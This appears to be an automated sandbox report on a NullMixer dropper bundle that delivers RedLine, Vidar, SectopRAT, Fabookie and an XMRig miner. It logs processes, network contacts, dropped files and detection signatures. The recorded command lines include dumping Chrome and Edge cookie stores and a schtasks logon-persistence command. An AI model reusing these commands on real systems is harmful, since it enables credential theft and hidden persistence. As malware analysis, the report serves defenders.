C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe

jobiea_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe

jobiea_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp" /SL5="$60158,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe

jobiea_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.exe

jobiea_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe

jobiea_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe

jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe

jobiea_7.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 272

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732633221 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 424

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
N/A 127.0.0.1:49277 tcp
N/A 127.0.0.1:49280 tcp
US 8.8.8.8:53 superstationcity.com udp
US 8.8.8.8:53 most-fast-link-download.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 sanctam.net udp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.microsoft.com udp
SG 37.0.11.9:80 N/A tcp
SG 37.0.11.9:80 N/A tcp
SG 37.0.11.9:80 N/A tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\libcurlpp.dll

\Users\Admin\AppData\Local\Temp\7zSC0678A96\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\libcurl.dll

\Users\Admin\AppData\Local\Temp\7zSC0678A96\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.txt

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.txt

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.txt

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.txt

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.txt

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.txt

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.txt

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.txt

\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe

C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp

\Users\Admin\AppData\Local\Temp\is-FQ6VN.tmp\idp.dll

\Users\Admin\AppData\Local\Temp\is-FQ6VN.tmp\_isetup\_shfoldr.dll

C:\Windows\winnetdriv.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\CabDD27.tmp

C:\Users\Admin\AppData\Local\Temp\TarDD59.tmp

C:\ProgramData\softokn3.dll

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-26 15:00

Reported

2024-11-26 15:02

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

Signatures

Detect Fabookie payload

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

RedLine

infostealer redline

RedLine payload

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Detected Nirsoft tools

Vidar Stealer

stealer

XMRig Miner payload

miner

ASPack v2.12-2.42

aspackv2

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4956 set thread context of 3320 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe
PID 4796 set thread context of 1852 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

UPX packed file

upx

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4972 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe
PID 4972 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe
PID 4972 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe
PID 3096 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe
PID 1724 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe
PID 4532 wrote to memory of 3692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe
PID 3280 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe
PID 2268 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe
